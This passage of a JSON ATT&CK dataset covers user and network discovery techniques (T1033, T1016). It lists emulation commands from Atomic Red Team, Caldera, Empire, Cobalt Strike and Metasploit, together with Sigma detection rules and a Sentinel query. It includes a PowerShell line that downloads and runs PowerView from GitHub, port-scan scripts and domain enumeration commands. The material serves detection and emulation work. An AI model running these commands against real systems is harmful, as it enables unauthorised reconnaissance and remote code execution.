"powershell/situational_awareness/network/powerview/get_session", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1033", + "Built-in Windows Command": "whoami /all /fo list", + "Cobalt Strike": "shell whoami /all /fo list", + "Metasploit": "getuid", + "Description": "Get current user information, SID, domain, groups the user belongs to, security privs of the user" + }, + { + "attack_technique": "T1033", + "display_name": "System Owner/User Discovery", + "atomic_tests": [ + { + "name": "System Owner/User Discovery", + "auto_generated_guid": "4c4959bf-addf-4b4a-be86-8d09cc1857aa", + "description": "Identify System owner or users on an endpoint.\n\nUpon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout. \nAdditionally, two files will be written to disk - computers.txt and usernames.txt.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "computer_name": { + "description": "Name of remote computer", + "type": "String", + "default": "localhost" + } + }, + "executor": { + "command": "cmd.exe /C whoami\nwmic useraccount get /ALL\nquser /SERVER:\"#{computer_name}\"\nquser\nqwinsta.exe /server:#{computer_name}\nqwinsta.exe\nfor /F \"tokens=1,2\" %i in ('qwinsta /server:#{computer_name} ^| findstr \"Active Disc\"') do @echo %i | find /v \"#\" | find /v \"console\" || echo %j > computers.txt\n@FOR /F %n in (computers.txt) DO @FOR /F \"tokens=1,2\" %i in ('qwinsta /server:%n ^| findstr \"Active Disc\"') do @echo %i | find /v \"#\" | find /v \"console\" || echo %j > usernames.txt\n", + "name": "command_prompt" + } + }, + { + "name": "System Owner/User Discovery", + "auto_generated_guid": "2a9b677d-a230-44f4-ad86-782df1ef108c", + "description": "Identify System owner or users on an endpoint\n\nUpon successful execution, sh will stdout list of 
usernames.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "users\nw\nwho\n", + "name": "sh" + } + }, + { + "name": "Find computers where user has session - Stealth mode (PowerView)", + "auto_generated_guid": "29857f27-a36f-4f7e-8084-4557cd6207ca", + "description": "Find existing user session on other computers. Upon execution, information about any sessions discovered will be displayed.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose\n", + "name": "powershell" + } + }, + { + "name": "User Discovery With Env Vars PowerShell Script", + "auto_generated_guid": "dcb6cdee-1fb0-4087-8bf8-88cfd136ba51", + "description": "Use the PowerShell environment variables to identify the current logged user.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[System.Environment]::UserName | Out-File -FilePath .\\CurrentactiveUser.txt \n$env:UserName | Out-File -FilePath .\\CurrentactiveUser.txt -Append\n", + "cleanup_command": "Remove-Item -Path .\\CurrentactiveUser.txt -Force\n", + "name": "powershell" + } + }, + { + "name": "GetCurrent User with PowerShell Script", + "auto_generated_guid": "1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b", + "description": "Use the PowerShell \"GetCurrent\" method of the WindowsIdentity .NET class to identify the logged user.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\\CurrentUserObject.txt\n", + "cleanup_command": "Remove-Item -Path .\\CurrentUserObject.txt -Force\n", + "name": "powershell" + } + } + ] + }, + { + "id": "aaf34d82-aea9-4278-8ec4-789653e4f5d9", + "name": "GetAdminMembers", + 
"description": "Get Administrator users for a computer", + "tactic": "discovery", + "technique": { + "attack_id": "T1033", + "name": "System Owner/User Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "Import-Module .\\powerview.ps1 -Force;\nGet-NetUser -AdminCount | ConvertTo-Json -Depth 1\n", + "parsers": { + "plugins.stockpile.app.parsers.json": [ + { + "source": "domain.user.name", + "custom_parser_vals": { + "json_key": "samaccountname", + "json_type": "str" + } + } + ] + }, + "payloads": [ + "powerview.ps1" + ] + } + } + } + }, + { + "id": "bd527b63-9f9e-46e0-9816-b8434d2b8989", + "name": "Current User", + "description": "Obtain user from current session", + "tactic": "discovery", + "technique": { + "attack_id": "T1033", + "name": "System Owner/User Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "whoami\n" + } + }, + "linux": { + "sh": { + "command": "whoami\n" + } + }, + "windows": { + "psh": { + "command": "whoami\n" + } + } + } + }, + { + "id": "c0da588f-79f0-4263-8998-7496b1a40596", + "name": "Identify active user", + "description": "Find user running agent", + "tactic": "discovery", + "technique": { + "attack_id": "T1033", + "name": "System Owner/User Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "whoami", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.user.name" + }, + { + "source": "domain.user.name" + } + ] + } + } + }, + "linux": { + "sh": { + "command": "whoami", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.user.name" + }, + { + "source": "domain.user.name" + } + ] + } + } + }, + "windows": { + "psh": { + "command": "$env:username\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.user.name" + }, + { + "source": "domain.user.name" + } + ] + } + }, + "cmd": { + "command": "echo %username%", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.user.name" + 
}, + { + "source": "domain.user.name" + } + ] + } + } + } + } + }, + { + "id": "f1cf4ea1-43f0-4604-9537-3d1b1b2d5b1c", + "name": "GetServiceAccounts", + "description": "Get Service Accounts for a domain", + "tactic": "discovery", + "technique": { + "attack_id": "T1033", + "name": "System Owner/User Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "Import-Module .\\powerview.ps1 -Force;\nGet-NetUser -SPN | ConvertTo-Json -Depth 1\n", + "parsers": { + "plugins.stockpile.app.parsers.json": [ + { + "source": "domain.user.name", + "custom_parser_vals": { + "json_key": "samaccountname", + "json_type": "str" + } + } + ] + }, + "payloads": [ + "powerview.ps1" + ] + } + } + } + }, + { + "Empire Module": "powershell/situational_awareness/network/bloodhound", + "ATT&CK Technique #1": "T1033", + "ATT&CK Technique #2": "", + "Technique": "System Owner/User Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/bloodhound\": [\"T1033\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_session", + "ATT&CK Technique #1": "T1033", + "ATT&CK Technique #2": "", + "Technique": "System Owner/User Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_session\": [\"T1033\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"whoami.exe\"or process_command_line contains \"whoami\"or file_directory contains \"useraccount get /ALL\"or process_path contains \"qwinsta.exe\"or process_path contains \"quser.exe\"or process_path contains \"systeminfo.exe\")", + "name": "System Owner User Discovery" + } + ], + "possible_detections": [ + { + "title": "System Owner or User Discovery", + "id": "9a0d8ca0-2385-4020-b6c6-cb6153ca56f3", + "status": "experimental", + "description": "Adversaries may use the information from System Owner/User Discovery during automated discovery 
to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.yaml" + ], + "logsource": { + "product": "linux", + "service": "auditd" + }, + "detection": { + "selection": { + "type": "EXECVE", + "a0": [ + "users", + "w", + "who" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Admin activity" + ], + "level": "low", + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + { + "title": "Whoami Execution", + "id": "e28a5a99-da44-436d-b7a0-2afc20a5f413", + "status": "experimental", + "description": "Detects the execution of whoami, which is often used by attackers after exloitation / privilege escalation but rarely used by administrators", + "references": [ + "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/" + ], + "author": "Florian Roth", + "date": "2018/08/13", + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "*\\whoami.exe" + }, + "selection2": { + "OriginalFileName": "whoami.exe" + }, + "condition": "selection or selection2" + }, + "falsepositives": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "PowerShell" + ], + [ + "4624", + "WMI Auth" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "200-500", + " 4100-4104", + "PowerShell" + ], + [ + "", + 
"4624", + "WMI Auth" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can 
be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/", + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + 
"https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://securelist.com/muddywater/88059/", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1016", + "command_list": [ + "ipconfig /all", + "shell ipconfig", + "ipconfig\npost/windows/gather/enum_domains", + "arp -a\nroute print", + "shell arp -a", + "route", + "nbtstat -a {IP | COMP_NAME }", + "shell c:\\windows\\sysnative\\nbstat.exe -a {IP | COMP_NAME}", + "ipconfig /all\nnetsh interface show interface\narp -a\nnbtstat -n\nnet config\n", + "netsh advfirewall firewall show rule name=all\n", + "if [ -x \"$(command -v arp)\" ]; then arp -a; else echo \"arp is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ifconfig)\" ]; then ifconfig; else echo \"ifconfig is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ip)\" ]; then ip addr; else echo \"ip is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v netstat)\" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo \"netstat is missing from the machine. 
skipping...\"; fi;\n", + "ipconfig /all\nnet config workstation\nnet view /all /domain\nnltest /domain_trusts\n", + "$ports = Get-content #{port_file}\n$file = \"$env:USERPROFILE\\Desktop\\open-ports.txt\"\n$totalopen = 0\n$totalports = 0\nNew-Item $file -Force\nforeach ($port in $ports) {\n $test = new-object system.Net.Sockets.TcpClient\n $wait = $test.beginConnect(\"allports.exposed\", $port, $null, $null)\n $wait.asyncwaithandle.waitone(250, $false) | Out-Null\n $totalports++ | Out-Null\n if ($test.Connected) {\n $result = \"$port open\" \n Write-Host -ForegroundColor Green $result\n $result | Out-File -Encoding ASCII -append $file\n $totalopen++ | Out-Null\n }\n else {\n $result = \"$port closed\" \n Write-Host -ForegroundColor Red $result\n $totalclosed++ | Out-Null\n $result | Out-File -Encoding ASCII -append $file\n }\n}\n$results = \"There were a total of $totalopen open ports out of $totalports ports tested.\"\n$results | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n", + "$ports = Get-content #{port_file}\n$file = \"#{output_file}\"\n$totalopen = 0\n$totalports = 0\nNew-Item $file -Force\nforeach ($port in $ports) {\n $test = new-object system.Net.Sockets.TcpClient\n $wait = $test.beginConnect(\"allports.exposed\", $port, $null, $null)\n $wait.asyncwaithandle.waitone(250, $false) | Out-Null\n $totalports++ | Out-Null\n if ($test.Connected) {\n $result = \"$port open\" \n Write-Host -ForegroundColor Green $result\n $result | Out-File -Encoding ASCII -append $file\n $totalopen++ | Out-Null\n }\n else {\n $result = \"$port closed\" \n Write-Host -ForegroundColor Red $result\n $totalclosed++ | Out-Null\n $result | Out-File -Encoding ASCII -append $file\n }\n}\n$results = \"There were a total of $totalopen open ports out of $totalports ports tested.\"\n$results | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n", + "$ports = Get-content PathToAtomicsFolder\\T1016\\src\\top-128.txt\n$file = \"#{output_file}\"\n$totalopen = 
0\n$totalports = 0\nNew-Item $file -Force\nforeach ($port in $ports) {\n $test = new-object system.Net.Sockets.TcpClient\n $wait = $test.beginConnect(\"allports.exposed\", $port, $null, $null)\n $wait.asyncwaithandle.waitone(250, $false) | Out-Null\n $totalports++ | Out-Null\n if ($test.Connected) {\n $result = \"$port open\" \n Write-Host -ForegroundColor Green $result\n $result | Out-File -Encoding ASCII -append $file\n $totalopen++ | Out-Null\n }\n else {\n $result = \"$port closed\" \n Write-Host -ForegroundColor Red $result\n $totalclosed++ | Out-Null\n $result | Out-File -Encoding ASCII -append $file\n }\n}\n$results = \"There were a total of $totalopen open ports out of $totalports ports tested.\"\n$results | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n", + "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -f (objectcategory=subnet)\n", + "PathToAtomicsFolder\\T1016\\src\\qakbot.bat\n", + "sudo defaults read /Library/Preferences/com.apple.alf\nsudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate\n", + "nbtstat -n\n", + "ping #{remote.host.fqdn}\n", + "./#{payload:9f639067-370a-40ba-b7ac-6f1c15d5a158} scan\n", + ".\\#{payload:28f9bf43-4f14-4965-9bd9-b70fd6993d8e} -Scan\n", + "./wifi.sh pref\n", + ".\\wifi.ps1 -Pref\n", + "for ip in $(seq 190 199); do ping -c 1 $(echo #{domain.broadcast.ip} |\ncut -d. 
-f-3).$ip -W 1; done\n", + "ifconfig | grep broadcast", + "sudo ifconfig\n", + "ipconfig\n", + "powershell/situational_awareness/host/dnsserver", + "powershell/situational_awareness/host/get_proxy", + "powershell/situational_awareness/network/arpscan", + "powershell/situational_awareness/network/powerview/get_subnet" + ], + "commands": [ + { + "command": "ipconfig /all", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell ipconfig", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "ipconfig\npost/windows/gather/enum_domains", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "arp -a\nroute print", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell arp -a", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "route", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "nbtstat -a {IP | COMP_NAME }", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell c:\\windows\\sysnative\\nbstat.exe -a {IP | COMP_NAME}", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "ipconfig /all\nnetsh interface show interface\narp -a\nnbtstat -n\nnet config\n", + "source": "atomics/T1016/T1016.yaml", + "name": "Atomic Red Team Test - System Network Configuration Discovery" + }, + { + "command": "netsh advfirewall firewall show rule name=all\n", + "source": 
"atomics/T1016/T1016.yaml", + "name": "Atomic Red Team Test - System Network Configuration Discovery" + }, + { + "command": "if [ -x \"$(command -v arp)\" ]; then arp -a; else echo \"arp is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ifconfig)\" ]; then ifconfig; else echo \"ifconfig is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ip)\" ]; then ip addr; else echo \"ip is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v netstat)\" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo \"netstat is missing from the machine. skipping...\"; fi;\n", + "source": "atomics/T1016/T1016.yaml", + "name": "Atomic Red Team Test - System Network Configuration Discovery" + }, + { + "command": "ipconfig /all\nnet config workstation\nnet view /all /domain\nnltest /domain_trusts\n", + "source": "atomics/T1016/T1016.yaml", + "name": "Atomic Red Team Test - System Network Configuration Discovery" + }, + { + "command": "$ports = Get-content #{port_file}\n$file = \"$env:USERPROFILE\\Desktop\\open-ports.txt\"\n$totalopen = 0\n$totalports = 0\nNew-Item $file -Force\nforeach ($port in $ports) {\n $test = new-object system.Net.Sockets.TcpClient\n $wait = $test.beginConnect(\"allports.exposed\", $port, $null, $null)\n $wait.asyncwaithandle.waitone(250, $false) | Out-Null\n $totalports++ | Out-Null\n if ($test.Connected) {\n $result = \"$port open\" \n Write-Host -ForegroundColor Green $result\n $result | Out-File -Encoding ASCII -append $file\n $totalopen++ | Out-Null\n }\n else {\n $result = \"$port closed\" \n Write-Host -ForegroundColor Red $result\n $totalclosed++ | Out-Null\n $result | Out-File -Encoding ASCII -append $file\n }\n}\n$results = \"There were a total of $totalopen open ports out of $totalports ports tested.\"\n$results | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n", + "source": "atomics/T1016/T1016.yaml", + "name": "Atomic Red Team Test - System Network 
Configuration Discovery" + }, + { + "command": "$ports = Get-content #{port_file}\n$file = \"#{output_file}\"\n$totalopen = 0\n$totalports = 0\nNew-Item $file -Force\nforeach ($port in $ports) {\n $test = new-object system.Net.Sockets.TcpClient\n $wait = $test.beginConnect(\"allports.exposed\", $port, $null, $null)\n $wait.asyncwaithandle.waitone(250, $false) | Out-Null\n $totalports++ | Out-Null\n if ($test.Connected) {\n $result = \"$port open\" \n Write-Host -ForegroundColor Green $result\n $result | Out-File -Encoding ASCII -append $file\n $totalopen++ | Out-Null\n }\n else {\n $result = \"$port closed\" \n Write-Host -ForegroundColor Red $result\n $totalclosed++ | Out-Null\n $result | Out-File -Encoding ASCII -append $file\n }\n}\n$results = \"There were a total of $totalopen open ports out of $totalports ports tested.\"\n$results | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n", + "source": "atomics/T1016/T1016.yaml", + "name": "Atomic Red Team Test - System Network Configuration Discovery" + }, + { + "command": "$ports = Get-content PathToAtomicsFolder\\T1016\\src\\top-128.txt\n$file = \"#{output_file}\"\n$totalopen = 0\n$totalports = 0\nNew-Item $file -Force\nforeach ($port in $ports) {\n $test = new-object system.Net.Sockets.TcpClient\n $wait = $test.beginConnect(\"allports.exposed\", $port, $null, $null)\n $wait.asyncwaithandle.waitone(250, $false) | Out-Null\n $totalports++ | Out-Null\n if ($test.Connected) {\n $result = \"$port open\" \n Write-Host -ForegroundColor Green $result\n $result | Out-File -Encoding ASCII -append $file\n $totalopen++ | Out-Null\n }\n else {\n $result = \"$port closed\" \n Write-Host -ForegroundColor Red $result\n $totalclosed++ | Out-Null\n $result | Out-File -Encoding ASCII -append $file\n }\n}\n$results = \"There were a total of $totalopen open ports out of $totalports ports tested.\"\n$results | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n", + "source": "atomics/T1016/T1016.yaml", + "name": 
"Atomic Red Team Test - System Network Configuration Discovery" + }, + { + "command": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -f (objectcategory=subnet)\n", + "source": "atomics/T1016/T1016.yaml", + "name": "Atomic Red Team Test - System Network Configuration Discovery" + }, + { + "command": "PathToAtomicsFolder\\T1016\\src\\qakbot.bat\n", + "source": "atomics/T1016/T1016.yaml", + "name": "Atomic Red Team Test - System Network Configuration Discovery" + }, + { + "command": "sudo defaults read /Library/Preferences/com.apple.alf\nsudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate\n", + "source": "atomics/T1016/T1016.yaml", + "name": "Atomic Red Team Test - System Network Configuration Discovery" + }, + { + "command": "nbtstat -n\n", + "source": "data/abilities/discovery/14a21534-350f-4d83-9dd7-3c56b93a0c17.yml", + "name": "Find Domain information" + }, + { + "command": "ping #{remote.host.fqdn}\n", + "source": "data/abilities/discovery/921055f4-5970-4707-909e-62f594234d91.yml", + "name": "Ping a remote host to see if it is accessible" + }, + { + "command": "./#{payload:9f639067-370a-40ba-b7ac-6f1c15d5a158} scan\n", + "source": "data/abilities/discovery/9a30740d-3aa8-4c23-8efa-d51215e8a5b9.yml", + "name": "View all potential WIFI networks on host" + }, + { + "command": ".\\#{payload:28f9bf43-4f14-4965-9bd9-b70fd6993d8e} -Scan\n", + "source": "data/abilities/discovery/9a30740d-3aa8-4c23-8efa-d51215e8a5b9.yml", + "name": "View all potential WIFI networks on host" + }, + { + "command": "./wifi.sh pref\n", + "source": "data/abilities/discovery/a0676fe1-cd52-482e-8dde-349b73f9aa69.yml", + "name": "See the most used WIFI networks of a machine" + }, + { + "command": ".\\wifi.ps1 -Pref\n", + "source": "data/abilities/discovery/a0676fe1-cd52-482e-8dde-349b73f9aa69.yml", + "name": "See the most used WIFI networks of a machine" + }, + { + "command": "for ip in $(seq 190 199); do ping -c 1 $(echo #{domain.broadcast.ip} |\ncut -d. 
-f-3).$ip -W 1; done\n", + "source": "data/abilities/discovery/ac9dce33-2acc-4b34-94ce-2596409ce8f0.yml", + "name": "Ping the network in order to build the ARP cache" + }, + { + "command": "ifconfig | grep broadcast", + "source": "data/abilities/discovery/b6f545ef-f802-4537-b59d-2cb19831c8ed.yml", + "name": "Capture the local network broadcast IP address" + }, + { + "command": "sudo ifconfig\n", + "source": "data/abilities/discovery/e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml", + "name": "View network configuration info for host" + }, + { + "command": "ipconfig\n", + "source": "data/abilities/discovery/e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml", + "name": "View network configuration info for host" + }, + { + "command": "powershell/situational_awareness/host/dnsserver", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/host/get_proxy", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/arpscan", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_subnet", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1016", + "Built-in Windows Command": "ipconfig /all", + "Cobalt Strike": "shell ipconfig", + "Metasploit": "ipconfig\npost/windows/gather/enum_domains", + "Description": "Get information about the domain, network adapters, DNS / WSUS servers" + }, + { + "Category": "T1016", + "Built-in Windows Command": "arp -a\nroute print", + "Cobalt Strike": "shell arp -a", + "Metasploit": "route", + "Description": 
"Display the ARP table" + }, + { + "Category": "T1016", + "Built-in Windows Command": "nbtstat -a {IP | COMP_NAME }", + "Cobalt Strike": "shell c:\\windows\\sysnative\\nbstat.exe -a {IP | COMP_NAME}", + "Metasploit": "", + "Description": "Used to get the MAC and IP addresses as well as some descriptive codes for machines (0x1C indicates a domain controller)" + }, + { + "attack_technique": "T1016", + "display_name": "System Network Configuration Discovery", + "atomic_tests": [ + { + "name": "System Network Configuration Discovery on Windows", + "auto_generated_guid": "970ab6a1-0157-4f3f-9a73-ec4166754b23", + "description": "Identify network configuration information\n\nUpon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "ipconfig /all\nnetsh interface show interface\narp -a\nnbtstat -n\nnet config\n", + "name": "command_prompt" + } + }, + { + "name": "List Windows Firewall Rules", + "auto_generated_guid": "038263cb-00f4-4b0a-98ae-0696c67e1752", + "description": "Enumerates Windows Firewall Rules using netsh.\n\nUpon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. 
Output will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "netsh advfirewall firewall show rule name=all\n", + "name": "command_prompt" + } + }, + { + "name": "System Network Configuration Discovery", + "auto_generated_guid": "c141bbdb-7fca-4254-9fd6-f47e79447e17", + "description": "Identify network configuration information.\n\nUpon successful execution, sh will spawn multiple commands and output will be via stdout.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if arp command exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v arp)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "(which yum && yum -y install net-tools)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y net-tools)\n" + } + ], + "executor": { + "command": "if [ -x \"$(command -v arp)\" ]; then arp -a; else echo \"arp is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ifconfig)\" ]; then ifconfig; else echo \"ifconfig is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ip)\" ]; then ip addr; else echo \"ip is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v netstat)\" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo \"netstat is missing from the machine. skipping...\"; fi;\n", + "name": "sh" + } + }, + { + "name": "System Network Configuration Discovery (TrickBot Style)", + "auto_generated_guid": "dafaf052-5508-402d-bf77-51e0700c02e2", + "description": "Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/\n\nUpon successful execution, cmd.exe will spawn `ipconfig /all`, `net config workstation`, `net view /all /domain`, `nltest /domain_trusts`. 
